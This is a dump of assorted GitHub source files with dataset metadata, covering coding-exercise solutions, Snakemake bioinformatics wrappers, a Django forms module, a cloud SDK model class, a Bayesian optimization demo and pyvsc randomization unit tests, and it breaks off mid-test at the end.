The records below follow this schema (one row per source file); field values in each record are separated by `|`, with the `content` field shown inline:

| Column | Type | Range / classes |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3–288 |
| content_id | string | length 40 |
| detected_licenses | list | length 0–112 |
| license_type | string | 2 classes |
| repo_name | string | length 5–115 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 684 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 (nullable) | 4.92k – 681M |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] (nullable) | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us] (nullable) | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 |
| gha_language | string | 147 classes |
| src_encoding | string | 25 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 128 – 12.7k |
| extension | string | 142 classes |
| content | string | length 128–8.19k |
| authors | list | length 1 |
| author_id | string | length 1–132 |
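As a rough illustration (the dataset path below is a placeholder, not taken from this dump), records with this schema can be streamed and filtered with the Hugging Face `datasets` library:

```python
from datasets import load_dataset

# Placeholder repository name; substitute the actual dataset path.
ds = load_dataset("org/code-dump", split="train", streaming=True)

# Keep only permissively licensed Python files under 4 KiB.
small_permissive = ds.filter(
    lambda row: row["license_type"] == "permissive" and row["length_bytes"] < 4096
)

for row in small_permissive.take(3):
    print(row["repo_name"], row["path"], row["detected_licenses"])
```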
be6a016ce6c16fe2faa6e74c48ad6571cc088641
|
b33ddc7b89d05e19fdeb69593872fd174fab9f4f
|
/URI-py/2875.py
|
49dc31d7091f31bea192a97075a7c40e9e9f21a3
|
[] |
no_license
|
ThiagoCComelli/URI-Online-Judge
|
8b8d609d880342b39ba0d396c0610ecb7e01a5af
|
5348f736b2d683f4b857232c22cccb7c1d8b8d65
|
refs/heads/master
| 2020-07-23T15:14:05.353948 | 2020-03-10T19:42:12 | 2020-03-10T19:42:12 | 207,606,956 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 337 |
py
|
# -*- coding: utf-8 -*-
while True:
    try:
        n, m = map(int, input().split())
        lista = []
        lista1 = []
        for i in range(n):
            lista.append(input().split())
        # visit each cell of the n x m grid read above
        for i in range(n):
            for j in range(m):
                a = lista[i][j]
    except EOFError:
        break
|
[
"[email protected]"
] | |
0a1abc1df723114b5f626549217071f99ce3f6d6
|
1dce03e6f3f5b23d1e5c599678624638943b9422
|
/docker/create_docker_images2.py
|
c963255960a9c9025948e08941e44f9ffe9c6e2f
|
[] |
no_license
|
volat1977/byte_of_python
|
76ec958bdc51c7538bb24e5d152b456feab603ca
|
60b58ca3927ef5e2801c93dd676d5f8b4c03d9fc
|
refs/heads/master
| 2020-12-26T07:23:10.562537 | 2020-03-24T05:31:03 | 2020-03-24T05:31:03 | 237,431,769 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 587 |
py
|
from io import BytesIO
import docker
dockerfile = '''
# Shared Volume
FROM busybox:buildroot-2014.02
VOLUME /data
CMD ["/bin/sh"]
'''
f = BytesIO(dockerfile.encode('utf-8'))
cli = docker.from_env()
response = cli.api.build(fileobj=f, rm=True, tag='test3', decode=True)
#for line in response:
# if line.keys()[0] in ('stream', 'error'):
# value = line.values()[0].strip()
# if value:
# print(value)
# for line in response:
# if line.keys in ('stream', 'error'):
# value = line.values()[0].strip()
# if value:
# print(value)
|
[
"[email protected]"
] | |
d753d0c4da9bb638deab2a12cfdd73f9e4680cb5
|
bac7a7507933ac5bb38b41bbe2a587764da3cf94
|
/snappy_wrappers/wrappers/link_in_bam/wrapper.py
|
09790324734c2213f0b8a7b3f82af6b18a1c8997
|
[
"MIT"
] |
permissive
|
Pregelnuss/snappy-pipeline
|
923b0f36117a2f55ee52f9a8564ed3bb82a8be16
|
31200eba84bff8e459e9e210d6d95e2984627f5c
|
refs/heads/master
| 2023-06-19T07:24:04.736033 | 2021-05-27T07:24:05 | 2021-05-27T07:24:05 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,063 |
py
|
# -*- coding: utf-8 -*-
"""CUBI+Snakemake wrapper code for external: Snakemake wrapper.py
"""
from snakemake import shell
__author__ = "Oliver Stolpe <[email protected]>"
shell.executable("/bin/bash")
this_file = __file__
input = snakemake.params.args["input"]
if not input:
raise Exception("No bam found")
shell(
r"""
set -x
# Write out information about conda installation.
conda list >{snakemake.log.conda_list}
conda info >{snakemake.log.conda_info}
# Also pipe stderr to log file
if [[ -n "{snakemake.log.log}" ]]; then
if [[ "$(set +e; tty; set -e)" != "" ]]; then
rm -f "{snakemake.log.log}" && mkdir -p $(dirname {snakemake.log.log})
exec 2> >(tee -a "{snakemake.log.log}" >&2)
else
rm -f "{snakemake.log.log}" && mkdir -p $(dirname {snakemake.log.log})
echo "No tty, logging disabled" >"{snakemake.log.log}"
fi
fi
# Setup auto-cleaned TMPDIR
export TMPDIR=$(mktemp -d)
trap "rm -rf $TMPDIR" EXIT
mkdir -p $TMPDIR/tmp.d
# Link in bam files with the proper file name scheme
ln -sr {input} {snakemake.output.bam}
# Link in the resulting BAM file or create the index
if [[ -e {input}.bai ]]; then
ln -sr {input}.bai {snakemake.output.bam_bai}
else
samtools index {snakemake.output.bam}
fi
# Build MD5 files
pushd $(dirname {snakemake.output.bam})
md5sum $(basename {snakemake.output.bam}) > $(basename {snakemake.output.bam}).md5
md5sum $(basename {snakemake.output.bam_bai}) > $(basename {snakemake.output.bam_bai}).md5
popd
# QC Report ---------------------------------------------------------------------------------------
# gather statistics from BAM file
# TODO: use pipes for only reading once from disk?
samtools stats {snakemake.output.bam} > {snakemake.output.report_bamstats_txt}
samtools flagstat {snakemake.output.bam} > {snakemake.output.report_flagstats_txt}
samtools idxstats {snakemake.output.bam} > {snakemake.output.report_idxstats_txt}
# call plot-bamstats
mkdir $TMPDIR/bamstats.d
plot-bamstats \
-p $TMPDIR/bamstats.d/ \
{snakemake.output.report_bamstats_txt} \
|| true # ignore failure
# Convert HTML report into one file.
inline-html \
--in-file $TMPDIR/bamstats.d/index.html \
--out-file {snakemake.output.report_bamstats_html} \
|| touch {snakemake.output.report_bamstats_html}
# Build MD5 files for the reports
md5sum {snakemake.output.report_bamstats_html} > {snakemake.output.report_bamstats_html_md5}
md5sum {snakemake.output.report_bamstats_txt} > {snakemake.output.report_bamstats_txt_md5}
md5sum {snakemake.output.report_flagstats_txt} >{snakemake.output.report_flagstats_txt_md5}
md5sum {snakemake.output.report_idxstats_txt} > {snakemake.output.report_idxstats_txt_md5}
# Additional logging for transparency & reproducibility
# Logging: Save a copy this wrapper (with the pickle details in the header)
cp {this_file} $(dirname {snakemake.log.log})/wrapper.py
# Logging: Save a permanent copy of the environment file used
cp $(dirname {this_file})/environment.yaml $(dirname {snakemake.log.log})/environment_wrapper.yaml
"""
)
|
[
"[email protected]"
] | |
e61d9c8b65dd2e6ddb62065629685896f512ffb7
|
0fe37e11df976c55fe5bbe492879b7cd8a95b7c5
|
/1_2_python变量_输出和输入_数字_字符串/04_str_test.py
|
3444adc19895857e5d4fee8cb2347e41708b2bfb
|
[] |
no_license
|
1286211699/mmc_code
|
9bb7761107604b445dea4fe5acf9d503fbc28dfa
|
ee97879632dfd7d24c604f7db52c82fa29109daa
|
refs/heads/master
| 2022-12-08T23:19:06.382825 | 2020-05-08T13:59:46 | 2020-05-08T13:59:46 | 177,100,815 | 2 | 0 | null | 2022-12-08T01:42:47 | 2019-03-22T08:25:37 |
HTML
|
UTF-8
|
Python
| false | false | 1,896 |
py
|
# name = 'for'
#
# name = "for's name is for"
# print(name)
# print('abcd\tefg')
# print('My name is %s'%('for'))
# print('I am %d years old'%(18))
# print('his height is %f m'%(1.78))
# print('his height is %.2f m'%(1.78))
# name = 'while'
#
# print(name[1:3])
# str_test = 'hello world world'
#
# print(str_test.partition('o'))
# print(str_test.rpartition('o'))
# my_str = 'hello:world:python '
# print(my_str)
# print(my_str.replace('l','w'))
# # print(my_str.splitlines())
# # print(my_str.split(':'))
# print(str_test.count('l'))
#
# print(str_test.find('w'))
#
# print(str_test.rfind('w'))
#
# print(str_test.index('o'))
# print(str_test.rindex('o'))
# print(str_test[::-1])
# print(str_test[::-2])
#
# print(str_test[1:9:-1])
# print(str_test[9:1:-1])
# print(str_test[0:7])
#
# print(str_test[:7])
#
# print(str_test[2:])
#
# print(str_test[:])
# print(str_test[::2])
# print(str_test[0:7:2])
# str_test = ' for '
# print(str_test.strip())  # strip() accounts for a big share of later data-cleaning work
# print(str_test.rstrip())
# print(str_test.lstrip())
# print(str_test.center(10,'x'))
# print(str_test.ljust(10,'x'))
# print(str_test.rjust(10,'x'))
# print(str_test.zfill(10))
#
# python = '{} is {}'
#
# print(python.format('for','cool'))
#
# print('hello'.upper())
# print('HELLO'.lower())
#
# print('12345a'.isalnum())
# print('abcdef'.isalpha())
# print('12345'.isdigit())
# print('HELLO'.isupper())
# print('hello'.islower())
# print(' '.isspace())
#
# print('for is cool'[3:].startswith(' '))
# print('for is cool'[3:].endswith('cool'))
# print(ord('a'))
# print(chr(97))
u = '学神'
str1 = u.encode('gbk')   # encode to GBK bytes
print(str1)
str2 = u.encode()        # default encoding is UTF-8
print(str2)
u1 = str1.decode('gbk')
print(u1)
u2 = str2.decode('utf-8')
print(u2)
|
[
"[email protected]"
] | |
404ccc4de81309e69083b0b19bb3d53830a09a20
|
9b64f0f04707a3a18968fd8f8a3ace718cd597bc
|
/huaweicloud-sdk-gaussdbfornosql/huaweicloudsdkgaussdbfornosql/v3/model/list_instances_datastore_result.py
|
34f5b1f20917eabd5ea29c17543d8217b496429f
|
[
"Apache-2.0"
] |
permissive
|
jaminGH/huaweicloud-sdk-python-v3
|
eeecb3fb0f3396a475995df36d17095038615fba
|
83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b
|
refs/heads/master
| 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,366 |
py
|
# coding: utf-8
import re
import six
class ListInstancesDatastoreResult:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'type': 'str',
'version': 'str'
}
attribute_map = {
'type': 'type',
'version': 'version'
}
def __init__(self, type=None, version=None):
"""ListInstancesDatastoreResult - a model defined in huaweicloud sdk"""
self._type = None
self._version = None
self.discriminator = None
self.type = type
self.version = version
@property
def type(self):
"""Gets the type of this ListInstancesDatastoreResult.
        Database engine.
:return: The type of this ListInstancesDatastoreResult.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this ListInstancesDatastoreResult.
        Database engine.
:param type: The type of this ListInstancesDatastoreResult.
:type: str
"""
self._type = type
@property
def version(self):
"""Gets the version of this ListInstancesDatastoreResult.
        Database version.
:return: The version of this ListInstancesDatastoreResult.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""Sets the version of this ListInstancesDatastoreResult.
        Database version.
:param version: The version of this ListInstancesDatastoreResult.
:type: str
"""
self._version = version
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListInstancesDatastoreResult):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
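# Editorial usage sketch (not part of the generated SDK module); the engine and
# version strings below are placeholder sample values.
if __name__ == "__main__":
    example = ListInstancesDatastoreResult(type="cassandra", version="3.11")
    print(example.to_dict())  # {'type': 'cassandra', 'version': '3.11'}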
|
[
"[email protected]"
] | |
3c061683d05e01d2e49fdf44a9642b8ba3230d38
|
7942342d457276bb266228d0236af647b3d55477
|
/django/contrib/auth/__init__.pyi
|
24b49bc00c2f2782b020918d77e8d81ac3a388da
|
[
"MIT"
] |
permissive
|
AsymmetricVentures/mypy-django
|
847c4e521ce4dec9a10a1574f9c32b234dafd00b
|
f6e489f5cf5672ecede323132665ccc6306f50b8
|
refs/heads/master
| 2020-06-30T01:53:44.434394 | 2016-12-22T22:45:50 | 2016-12-22T22:45:50 | 74,397,884 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 840 |
pyi
|
# Stubs for django.contrib.auth (Python 3.6)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from typing import Any, Optional
from django.apps import apps as django_apps
from .signals import user_logged_in as user_logged_in, user_logged_out as user_logged_out, user_login_failed as user_login_failed
SESSION_KEY = ... # type: str
BACKEND_SESSION_KEY = ... # type: str
HASH_SESSION_KEY = ... # type: str
REDIRECT_FIELD_NAME = ... # type: str
def load_backend(path): ...
def get_backends(): ...
def authenticate(**credentials): ...
def login(request, user, backend: Optional[Any] = ...): ...
def logout(request): ...
def get_user_model(): ...
def get_user(request): ...
def get_permission_codename(action, opts): ...
def update_session_auth_hash(request, user): ...
default_app_config = ... # type: str
|
[
"[email protected]"
] | |
0405898d24af93f463de789847b0398a0e8e0b97
|
092d82f8a64f8e33a739ae023667253a75bfb9ae
|
/jury/forms.py
|
ac08bc91b6d6b266345bc9fb2f865acbf50bba23
|
[
"MIT"
] |
permissive
|
COdingaorg/The_Jury
|
8c103eec028891b1ee98ede786fb54638bd16ba6
|
a4432269a023edf49a010644ca4f06324a934d7f
|
refs/heads/main
| 2023-06-18T10:43:14.888503 | 2021-07-20T16:05:59 | 2021-07-20T16:05:59 | 386,658,998 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 679 |
py
|
from jury.models import UserProfile, UserProject
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
class registerUser(UserCreationForm):
class Meta:
model = User
fields = ['username', 'first_name', 'last_name', 'email', 'password1', 'password2']
class UploadProjectForm(forms.ModelForm):
class Meta:
model = UserProject
fields = ['project_title', 'project_image', 'project_description', 'project_link']
class AddorEditProfile(forms.ModelForm):
class Meta:
model = UserProfile
fields = ['photo_path', 'user_bio', 'facebook_account', 'twitter_account', 'instagram_account']
|
[
"[email protected]"
] | |
5404e3ad8934d8abdd386447c64ee0c0a8c716f7
|
93f5ee5cc7b863029c54a766e9f5fa0b0e52191f
|
/BayesianOptimization/20180403_two_hparas.py
|
f2c660d6aa1078720adfdb30d305f189ed7051c7
|
[] |
no_license
|
ShihPingLai/Jacob-deep_learning
|
29ad17839da7a34e01db1a626942862e250e8619
|
dfbaa178ac537a189a062a23904072a7d8e550a9
|
refs/heads/master
| 2020-03-13T11:51:51.276939 | 2018-04-26T04:19:15 | 2018-04-26T04:19:15 | 131,108,620 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,156 |
py
|
#!/usr/bin/python3
'''
Abstract:
This is a program to exercise how to optimize deep learning with Bayesian Optimization.
Copy from "BayesianOptimization/examples/exploitation vs exploration.ipynb"
Usage:
20180403_two_hparas.py
Source:
BayesianOptimization/examples/exploitation vs exploration.ipynb
##################################
# Python3 #
# This code is made in python3 #
##################################
20170403
####################################
update log
20180403 version alpha 1:
1. I don't know
'''
# modules for Bayesian
from bayes_opt import BayesianOptimization
import pymc as pm
# modules for deep learning
import tensorflow as tf
# common modules
import numpy as np
import matplotlib.pyplot as plt
import time
from IPython.core.pylabtools import figsize
# Utility function for plotting
def plot_bo(f, bo, figname):
xs = [x["x"] for x in bo.res["all"]["params"]]
ys = bo.res["all"]["values"]
mean, sigma = bo.gp.predict(np.arange(len(f)).reshape(-1, 1), return_std=True)
plt.figure(figsize=(16, 9))
plt.plot(f)
plt.plot(np.arange(len(f)), mean)
plt.fill_between(np.arange(len(f)), mean+sigma, mean-sigma, alpha=0.1)
plt.scatter(bo.X.flatten(), bo.Y, c="red", s=50, zorder=10)
plt.xlim(0, len(f))
plt.ylim(f.min()-0.1*(f.max()-f.min()), f.max()+0.1*(f.max()-f.min()))
plt.savefig(figname)
return
#--------------------------------------------
# main code
if __name__ == "__main__":
VERBOSE = 0
# measure times
start_time = time.time()
#-----------------------------------
# load hyperparas
# use sklearn's default parameters for theta and random_start
gp_params = {"alpha": 1e-5, "n_restarts_optimizer": 2}
# Target function
np.random.seed(42)
xs = np.linspace(-2, 10, 10000)
f = np.exp(-(xs - 2)**2) + np.exp(-(xs - 6)**2/10) + 1/ (xs**2 + 1)
if VERBOSE>0:
plt.plot(f)
plt.show()
#-----------------------------------
# Acquisition function 1: Upper Confidence Bound
# Prefer exploitation (kappa=1.0)
bo = BayesianOptimization(f=lambda x: f[int(x)],
pbounds={"x": (0, len(f)-1)},
verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="ucb", kappa=1, **gp_params)
plot_bo(f, bo, "ucb_exploitation.png")
# Prefer exploration (kappa=10)
bo = BayesianOptimization(f=lambda x: f[int(x)],
pbounds={"x": (0, len(f)-1)},
verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="ucb", kappa=10, **gp_params)
plot_bo(f, bo, "ucb_exploration.png")
#-----------------------------------
# Acquisition function 2: Expected Improvement
# Prefer exploitation (xi=0.0)
bo = BayesianOptimization(f=lambda x: f[int(x)],
pbounds={"x": (0, len(f)-1)},
verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="ei", xi=1e-4, **gp_params)
plot_bo(f, bo, "ei_exploitation.png")
# Prefer exploration (xi=0.1)
bo = BayesianOptimization(f=lambda x: f[int(x)],
pbounds={"x": (0, len(f)-1)},
verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="ei", xi=0.1, **gp_params)
plot_bo(f, bo, "ei_exploration.png")
#-----------------------------------
# Acquisition function 3: Probability of Improvement
# Prefer exploitation (xi=0.0)
bo = BayesianOptimization(f=lambda x: f[int(x)], pbounds={"x": (0, len(f)-1)}, verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="poi", xi=1e-4, **gp_params)
plot_bo(f, bo, "poi_exploitation.png")
# Prefer exploration (xi=0.1)
bo = BayesianOptimization(f=lambda x: f[int(x)], pbounds={"x": (0, len(f)-1)}, verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="poi", xi=0.1, **gp_params)
plot_bo(f, bo, "poi_exploration.png")
#-----------------------------------
# measuring time
elapsed_time = time.time() - start_time
print ("Exiting Main Program, spending ", elapsed_time, "seconds.")
|
[
"[email protected]"
] | |
c88a1af397f5418a03100cac9cde8e9e4629f207
|
34d1d64a049dd3a25293955f6312072f2fcb3905
|
/set-1/challenge2.py
|
f54288641f2df4a0648832da78827542e6a9bb54
|
[] |
no_license
|
alex-bellon/cryptopals
|
c82ec87377911e6cae365cb48b2058789b93b9a1
|
5bc6242a5b972866ba7eebe2f6efa80c7ebff71c
|
refs/heads/master
| 2020-05-03T18:40:02.320249 | 2019-08-16T21:15:27 | 2019-08-16T21:15:27 | 178,761,916 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 189 |
py
|
a = '1c0111001f010100061a024b53535009181c'
b = '686974207468652062756c6c277320657965'
aBin = bin(int(a, 16))[2:]
bBin = bin(int(b, 16))[2:]
c = int(aBin, 2) ^ int(bBin, 2)
print(hex(c))
|
[
"[email protected]"
] | |
26534e055871d229971a287afd01f30afec488e8
|
03d07de94fc22d1583c45ca84c711a06df8a40ff
|
/lc/dynamic_programming/lc_91_decode-ways.py
|
47e6fb60ea6793ea85275e7e4575d8b528ab5713
|
[] |
no_license
|
gaopenghigh/algorithm
|
94e04293c69a2ad6903495e1cf6e1b75556535bb
|
f5d78c98c7201c56f9d4c3a9c0c76e9447a17985
|
refs/heads/master
| 2022-03-11T18:46:38.712923 | 2022-02-20T14:20:54 | 2022-02-20T14:20:54 | 54,484,549 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,054 |
py
|
# 91. Decode Ways
# Difficulty: Medium
# A message containing letters A-Z is encoded using the following mapping:
# 'A' -> "1"
# 'B' -> "2"
# ...
# 'Z' -> "26"
# To decode the message, all digits must be mapped back to letters by reversing the mapping above (there may be several ways). For example, "11106" can be mapped as:
# "AAJF", grouping the message as (1 1 10 6)
# "KJF", grouping the message as (11 10 6)
# Note that the grouping (1 11 06) is invalid, because "06" cannot be mapped to "F": "6" and "06" are not equivalent under the mapping.
# Given a non-empty string s containing only digits, return the total number of ways to decode it.
# The test cases guarantee that the answer fits in a 32-bit integer.
#
# Example 1:
# Input: s = "12"
# Output: 2
# Explanation: it can be decoded as "AB" (1 2) or "L" (12).
#
# Example 2:
# Input: s = "226"
# Output: 3
# Explanation: it can be decoded as "BZ" (2 26), "VF" (22 6), or "BBF" (2 2 6).
#
# Example 3:
# Input: s = "0"
# Output: 0
# Explanation: no character maps to a number starting with 0.
# The only valid mappings that contain 0 are 'J' -> "10" and 'T' -> "20".
# Since no character maps to "0" on its own, there is no valid way to decode the string: every digit must be mapped.
#
# Constraints:
# 1 <= s.length <= 100
# s contains only digits and may contain leading zeros.
# The first step of dynamic programming is to pin down two things: the "state" and the "choices".
# A state describes a configuration of the problem; each state defines a subproblem, and the core of DP is decomposing the problem into subproblems.
# A choice is an action that reduces the problem to one of those subproblems.
# The general DP framework looks like:
# for state1 in all values of state1:
#     for state2 in all values of state2:
#         for ...
#             dp[state1][state2][...] = best_of(choice1, choice2, ...)
#
# In this problem the "state" is the remaining string to decode.
# As for the choices: the last character of the string either stands alone or pairs with the character before it.
# Let dp[i] = x mean that s[:i] can be decoded in x ways.
# For the last character s[i-1] of s[:i] there are two cases:
# 1. s[i-1] stands alone, which requires 1 <= int(s[i-1]) <= 9; this contributes dp[i-1]
# 2. s[i-1] pairs with s[i-2], which requires s[i-2] != '0' and 1 <= int(s[i-2]) * 10 + int(s[i-1]) <= 26; this contributes dp[i-2]
# dp[i] is the sum of the two contributions.
# Base case: dp[0] = 1, i.e. the empty string counts as one way to decode.
# Also, since dp[i] depends only on dp[i-1] and dp[i-2], the dp array can be compressed to a few rolling variables (a two-variable version is sketched after the Solution class below).
class Solution:
def numDecodings(self, s: str) -> int:
dp = [0 for _ in range(len(s)+1)]
dp[0] = 1
for i in range(1, len(s)+1):
x = 0
if 1 <= int(s[i-1]) <= 9:
x = dp[i-1]
if s[i-2] != '0' and 1 <= int(s[i-2])*10 + int(s[i-1]) <= 26:
x += dp[i-2]
dp[i] = x
return dp[len(s)]
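# Editorial sketch of the rolling-variable variant mentioned in the notes above
# (not part of the original solution): dp[i] depends only on dp[i-1] and
# dp[i-2], so two variables are enough.
class SolutionO1:
    def numDecodings(self, s: str) -> int:
        prev2, prev1 = 1, (1 if s[0] != '0' else 0)  # dp[0], dp[1]
        for i in range(2, len(s) + 1):
            cur = 0
            if s[i-1] != '0':                                # s[i-1] stands alone
                cur += prev1
            if s[i-2] != '0' and 10 <= int(s[i-2:i]) <= 26:  # s[i-2:i] pairs up
                cur += prev2
            prev2, prev1 = prev1, cur
        return prev1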
if __name__ == '__main__':
s = '12'
print(Solution().numDecodings(s))
|
[
"[email protected]"
] | |
6ffabdb437b2f0229262f2a7b57b5eb2b66df757
|
beb12cce69e21804a9ec4d64062bf6bb062261aa
|
/bin/EAFP.py
|
74646c34e932b3821298f5c393f4bebacf076c1c
|
[] |
no_license
|
voyeg3r/dotfaster
|
f7a0cad32ea3420417cd728be24a58533cb907fa
|
90c4f1ec4471668fec1f4db755158058fb533be2
|
refs/heads/master
| 2021-01-02T22:49:47.246952 | 2018-06-02T20:56:58 | 2018-06-02T20:56:58 | 99,405,357 | 5 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 678 |
py
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# ------------------------------------------------
# Creation Date: 23-03-2017
# Last Change: ter 29 nov 2016 09:21:52 BRT
# File: EAFP.py
# author: sergio luiz araujo silva
# site: http://vivaotux.blogspot.com
# twitter: @voyeg3r
# ------------------------------------------------
'''
This script attempts to show the concept of:
It is easier to ask forgiveness than permission
'''
person = {'name': 'Jess', 'age': 23, 'job': 'Programmer'}
try:
print("I'm {name}. I'm {age} years old and I'm {job}".format(**person))
except KeyError as e:
print(f"Missing {e} key")
|
[
"[email protected]"
] | |
0876651216fe8d66b6ac1486bdb463a7eb6bcf0b
|
b37b62a73a14ed3904ffed1db99dafe01bc9eca3
|
/app/list/models.py
|
3c3e2f812571158f337b54618fddebb78ef4c17e
|
[] |
no_license
|
gambler1541/django-pagination
|
d340d7ce3186f801ce1cf4aadb59ee77bd52e9d6
|
44c32be793c0bd2332f29ba5422205ccf0c2d2b8
|
refs/heads/master
| 2020-04-16T22:56:16.565405 | 2019-01-16T06:59:51 | 2019-01-16T06:59:51 | 165,990,830 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 146 |
py
|
from django.db import models
from django.views.generic import ListView
class Constacts(models.Model):
text = models.TextField(default='')
|
[
"[email protected]"
] | |
fb20a737b4b3bc2e0a86a1ea9b5a7945456c6851
|
dacdebab897f9287f37a2e85c5705a926ddd36aa
|
/tests/test_issue930/Snakefile
|
06cbf60fd181788b35dd44ff28d8bc6855f13952
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
snakemake/snakemake
|
5d4528193d87786d7b372ca7653ece302ff46965
|
27b224ed12448df8aebc7d1ff8f25e3bf7622232
|
refs/heads/main
| 2023-09-02T08:37:04.323976 | 2023-08-11T10:02:34 | 2023-08-11T10:02:34 | 212,840,200 | 1,941 | 536 |
MIT
| 2023-09-11T09:51:44 | 2019-10-04T14:58:11 |
HTML
|
UTF-8
|
Python
| false | false | 646 |
samples = ["0","1"]
rule all:
input:
"test.out"
rule build_index:
output:
"large_reference_index"
shell:
"touch {output}"
rule a:
output:
"a/{sample}.out"
group:
"sample_group"
shell:
"touch {output}"
rule b:
input:
rules.a.output,
rules.build_index.output
output:
"b/{sample}.out"
group:
"sample_group"
shell:
"touch {output}"
rule c:
input:
expand("a/{sample}.out", sample=samples),
expand("b/{sample}.out", sample=samples)
output:
"test.out"
shell:
"touch {output}"
|
[
"[email protected]"
] | ||
25ed4fc80f15bd27a6243626cc74db6d6f20abe2
|
8bb3bcf914860c20fb4a7163a8e0691cd802dd65
|
/ve/unit/test_list_object.py
|
df090cc057e76b5308629ac65f3383056bb0ac50
|
[
"Apache-2.0"
] |
permissive
|
nitinm694/pyvsc
|
8586cc2497f336289fecbfeb9e6dd788f4070b60
|
612de9e6244c685a3df1972e4860abfe35b614e1
|
refs/heads/master
| 2023-07-28T01:49:10.917496 | 2021-09-12T19:06:00 | 2021-09-12T19:06:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,362 |
py
|
'''
Created on Jun 20, 2020
@author: ballance
'''
import vsc
from vsc_test_case import VscTestCase
from vsc.visitors.model_pretty_printer import ModelPrettyPrinter
class TestListObject(VscTestCase):
def test_smoke(self):
@vsc.randobj
class item_c(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
@vsc.randobj
class container_c(object):
def __init__(self):
self.l = vsc.rand_list_t(item_c())
for i in range(10):
self.l.append(item_c())
c = container_c()
c.randomize()
for i,it in enumerate(c.l):
print("Item[" + str(i) + "] a=" + str(it.a) + " b=" + str(it.b))
def test_constraints(self):
@vsc.randobj
class item_c(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
@vsc.randobj
class container_c(object):
def __init__(self):
self.l = vsc.rand_list_t(item_c())
for i in range(10):
self.l.append(item_c())
@vsc.constraint
def all_eq_c(self):
with vsc.foreach(self.l) as it:
it.a == it.b
c = container_c()
for i in range(100):
c.randomize()
for it in c.l:
self.assertEqual(it.a, it.b)
def test_init_array_block(self):
@vsc.randobj
class item_c(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
@vsc.randobj
class container_c(object):
def __init__(self):
self.l = vsc.rand_list_t(item_c())
for i in range(10):
self.l.append(item_c())
@vsc.constraint
def all_eq_c(self):
with vsc.foreach(self.l, it=True,idx=True) as (idx,it):
with vsc.if_then((idx&1) == 0):
it.a < it.b
with vsc.else_then:
it.a > it.b
c = container_c()
for i in range(100):
c.randomize()
self.assertEqual(10, len(c.l))
for i,it in enumerate(c.l):
if (i%2) == 0:
self.assertLess(it.a, it.b)
else:
self.assertGreater(it.a, it.b)
def test_diff_classes(self):
@vsc.randobj
class item_c(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
@vsc.randobj
class item_c_1(item_c):
def __init__(self):
super().__init__()
@vsc.constraint
def a_lt_b_c(self):
self.a < self.b
@vsc.randobj
class item_c_2(item_c):
def __init__(self):
super().__init__()
@vsc.constraint
def a_gt_b_c(self):
self.a > self.b
@vsc.randobj
class container_c(object):
def __init__(self):
self.l = vsc.rand_list_t(item_c())
for i in range(10):
if i%2 == 0:
self.l.append(item_c_1())
else:
